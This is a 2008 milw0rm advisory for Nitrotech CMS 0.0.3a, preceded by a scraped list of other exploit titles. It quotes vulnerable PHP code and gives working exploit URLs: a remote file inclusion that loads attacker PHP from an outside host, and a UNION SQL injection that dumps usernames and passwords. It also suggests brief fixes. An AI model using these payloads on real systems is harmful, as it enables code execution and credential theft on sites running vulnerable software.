
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
57 lines
1.7 KiB
Text
Executable file
57 lines
1.7 KiB
Text
Executable file
Name: Nitrotech 0.0.3a Multiple Remote Vulnerabilities
|
|
Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr
|
|
Author: Osirys, thanks to x0r
|
|
Contact: osirys@live.it
|
|
|
|
Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection.
|
|
|
|
#### Remote File Inclusion Vulnerability
|
|
|
|
The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable.
|
|
Let's see the code.
|
|
|
|
File: /[path]/includes/common.php
|
|
|
|
[code]
|
|
<?php
|
|
|
|
session_start();
|
|
$SID = session_id();
|
|
|
|
include($root . "config.php");
|
|
# OTHER CODE
|
|
[/code]
|
|
|
|
## EXPLOIT:
|
|
http://localhost/[path]/includes/common.php?root=http://oursite.it/phpcode.txt??
|
|
##
|
|
|
|
As we can see, it's included a non declareted variable -> $root.
|
|
To fix this bug, we could just define this variable.
|
|
|
|
#### Sql Injection Vulnerability
|
|
|
|
Note: In the source there could be other sql injection, just found them by yourself if you are intersted !
|
|
|
|
This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability
|
|
we could filtered the variable, for example with an int().
|
|
|
|
File: /[path]/members.php
|
|
|
|
[code]
|
|
if($page_mode == 'view_user')
|
|
{
|
|
$query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'";
|
|
$result1 = mysql_query($query1);
|
|
# OTHER CODE
|
|
[/code]
|
|
|
|
## EXPLOIT:
|
|
http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user&
|
|
##
|
|
|
|
As we can see, The 'id' variable comes directly from get. So we can inject our hell code.
|
|
|
|
####
|
|
|
|
# milw0rm.com [2008-11-24]
|